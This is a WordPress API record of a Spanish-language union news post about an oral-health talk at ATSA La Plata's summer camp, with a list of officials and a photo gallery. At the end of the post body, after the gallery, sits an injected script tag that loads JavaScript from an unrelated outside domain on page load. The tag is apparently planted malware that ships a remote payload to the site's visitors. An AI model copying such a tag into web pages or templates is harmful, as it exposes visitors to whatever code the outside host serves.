{"id":20484,"date":"2026-01-27T14:51:53","date_gmt":"2026-01-27T17:51:53","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=20484"},"modified":"2026-02-02T16:05:39","modified_gmt":"2026-02-02T19:05:39","slug":"segunda-jornada-de-salud-bucal-en-la-colonia","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2026\/01\/segunda-jornada-de-salud-bucal-en-la-colonia\/","title":{"rendered":"Segunda jornada de Salud Bucal en la Colonia"},"content":{"rendered":"\n<p><img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\udce3\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/tba\/1\/16\/1f4e3.png\">Hoy tuvimos una nueva Jornada de Salud Bucal en nuestra querida Colonia de Vacaciones.<img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\ude01\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t4f\/1\/16\/1f601.png\"><\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83e\uddb7\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t26\/1\/16\/1f9b7.png\">El encuentro estuvo destinado a colonas y colonos que pudieron participar de una charla donde se hizo foco en la importancia de <a href=\"https:\/\/www.facebook.com\/hashtag\/prevenci%C3%B3n?__eep__=6&amp;__cft__[0]=AZZ2Bd7YA-9S8vop6NYuOOjaGowwmI6R0lvfXvkB0ehlmf89oWL0Ji0K1OoYkyytgwLeoOEDc8zh_WzXIhEMfynKZ72xEDx84adfvNB0EfJ9JlnJatVPNB4lRN9Xxnk5Qj8A9NHWM7nVcpAPEjwUxNaZZLWFahCznC_BKsB6awUhrUb6d12hySNVZE7s6bzPhOs&amp;__tn__=*NK-R\">#prevenci\u00f3n<\/a>, <a href=\"https:\/\/www.facebook.com\/hashtag\/alimentacion?__eep__=6&amp;__cft__[0]=AZZ2Bd7YA-9S8vop6NYuOOjaGowwmI6R0lvfXvkB0ehlmf89oWL0Ji0K1OoYkyytgwLeoOEDc8zh_WzXIhEMfynKZ72xEDx84adfvNB0EfJ9JlnJatVPNB4lRN9Xxnk5Qj8A9NHWM7nVcpAPEjwUxNaZZLWFahCznC_BKsB6awUhrUb6d12hySNVZE7s6bzPhOs&amp;__tn__=*NK-R\">#alimentacion<\/a> y cepillado de dientes, para poder tener una vida saludable.<\/p>\n\n\n\n<p>En representaci\u00f3n de nuestro Sec. General, Pedro Borgini, participaron del evento, el Pro Sec. de Finanzas, Mauricio G\u00f3mez; el Sec. de Organizaci\u00f3n, Jorge Ropat; el Sec. de Deportes, Cristian Montenegro; la Coordinadora de la Colonia y Sec. de la Mujer, Karina Rodr\u00edguez; y los compa\u00f1eros Rub\u00e9n Bandarenko y Julia Esp\u00edndola.<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" height=\"16\" width=\"16\" alt=\"\ud83d\udc49\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/t51\/1\/16\/1f449.png\">La capacitaci\u00f3n estuvo a cargo del asistente social de la obra social OSPSA, Alberto Blescia, y los profesionales Ver\u00f3nica Cufr\u00e9, y Federico Arguiano.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/hashtag\/verano2025?__eep__=6&amp;__cft__[0]=AZZ2Bd7YA-9S8vop6NYuOOjaGowwmI6R0lvfXvkB0ehlmf89oWL0Ji0K1OoYkyytgwLeoOEDc8zh_WzXIhEMfynKZ72xEDx84adfvNB0EfJ9JlnJatVPNB4lRN9Xxnk5Qj8A9NHWM7nVcpAPEjwUxNaZZLWFahCznC_BKsB6awUhrUb6d12hySNVZE7s6bzPhOs&amp;__tn__=*NK-R\">#Verano2025<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/sanidadatsalaplata?__eep__=6&amp;__cft__[0]=AZZ2Bd7YA-9S8vop6NYuOOjaGowwmI6R0lvfXvkB0ehlmf89oWL0Ji0K1OoYkyytgwLeoOEDc8zh_WzXIhEMfynKZ72xEDx84adfvNB0EfJ9JlnJatVPNB4lRN9Xxnk5Qj8A9NHWM7nVcpAPEjwUxNaZZLWFahCznC_BKsB6awUhrUb6d12hySNVZE7s6bzPhOs&amp;__tn__=*NK-R\">#SanidadATSALaPlata<\/a><a href=\"https:\/\/www.facebook.com\/hashtag\/siemprejuntoavos?__eep__=6&amp;__cft__[0]=AZZ2Bd7YA-9S8vop6NYuOOjaGowwmI6R0lvfXvkB0ehlmf89oWL0Ji0K1OoYkyytgwLeoOEDc8zh_WzXIhEMfynKZ72xEDx84adfvNB0EfJ9JlnJatVPNB4lRN9Xxnk5Qj8A9NHWM7nVcpAPEjwUxNaZZLWFahCznC_BKsB6awUhrUb6d12hySNVZE7s6bzPhOs&amp;__tn__=*NK-R\">#SiempreJuntoAVos<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20485\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-3.jpeg\" alt=\"\" class=\"wp-image-20485\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-3.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-3-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-3-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20486\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-2.jpeg\" alt=\"\" class=\"wp-image-20486\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-2.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-2-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-2-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20490\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-1.jpeg\" alt=\"\" class=\"wp-image-20490\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-1.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-1-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-1-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20487\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25.jpeg\" alt=\"\" class=\"wp-image-20487\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.25-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20488\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-5.jpeg\" alt=\"\" class=\"wp-image-20488\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-5.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-5-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-5-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20489\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-4.jpeg\" alt=\"\" class=\"wp-image-20489\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-4.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-4-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-4-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20491\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-3.jpeg\" alt=\"\" class=\"wp-image-20491\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-3.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-3-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-3-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20492\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-2.jpeg\" alt=\"\" class=\"wp-image-20492\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-2.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-2-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-2-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"20493\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-1.jpeg\" alt=\"\" class=\"wp-image-20493\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20494\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24.jpeg\" alt=\"\" class=\"wp-image-20494\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-27-at-13.38.24-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n<\/figure>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy tuvimos una nueva Jornada de Salud Bucal en nuestra querida Colonia de Vacaciones. El&#8230;<\/p>\n","protected":false},"author":2,"featured_media":20493,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,126,87,146,98,147,88,81,85,148],"tags":[],"class_list":["post-20484","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-afiliado","category-colonia","category-convenios","category-destacado","category-home","category-novedades","category-obra-social","category-salud","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=20484"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20484\/revisions"}],"predecessor-version":[{"id":20597,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20484\/revisions\/20597"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/20493"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=20484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=20484"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=20484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}